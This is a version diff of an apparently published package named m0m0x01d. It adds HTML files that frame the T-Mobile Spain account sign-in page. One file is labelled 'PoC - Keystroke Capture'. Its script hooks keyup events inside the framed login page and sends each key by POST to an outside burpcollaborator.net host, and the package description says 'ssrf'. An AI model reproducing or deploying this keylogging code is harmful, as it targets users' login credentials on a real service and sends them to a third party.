m0m0x01d 15.0.0 → 17.0.0

package/iframe.svg.html

@@ -0,0 +1 @@
+<iframe src="https://es.account.t-mobile.com/signin/v2/"></iframe>

package/iframe2.svg.html

@@ -0,0 +1,42 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>PoC - Keystroke Capture</title>
+    <script>
+        // Function to send captured data to your server
+        function sendKeystrokes(data) {
+            var xhr = new XMLHttpRequest();
+            xhr.open("POST", "https://q1sbaric7jhkozf4ae7tuk5gm7sygn.burpcollaborator.net/keystrokes", true);
+            xhr.setRequestHeader("Content-Type", "application/json");
+            xhr.send(JSON.stringify({ keystrokes: data }));
+        }
+
+        // Function to capture keystrokes inside the iframe
+        function captureKeystrokes() {
+            var iframe = document.getElementById('login-iframe').contentWindow;
+
+            iframe.document.onkeyup = function(event) {
+                // Capture each key press and send it to the server
+                sendKeystrokes(event.key);
+            };
+        }
+
+        // Start capturing keystrokes when the iframe is loaded
+        window.onload = function() {
+            var iframe = document.getElementById('login-iframe');
+
+            iframe.onload = function() {
+                captureKeystrokes();
+            };
+        };
+    </script>
+</head>
+<body>
+    <h1>Login Page</h1>
+    <!-- Embedding the login page -->
+    <iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
+</body>
+</html>
+

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "m0m0x01d",
-  "version": "15.0.0",
+  "version": "17.0.0",
   "description": "ssrf",
   "main": "index.html",
   "scripts": {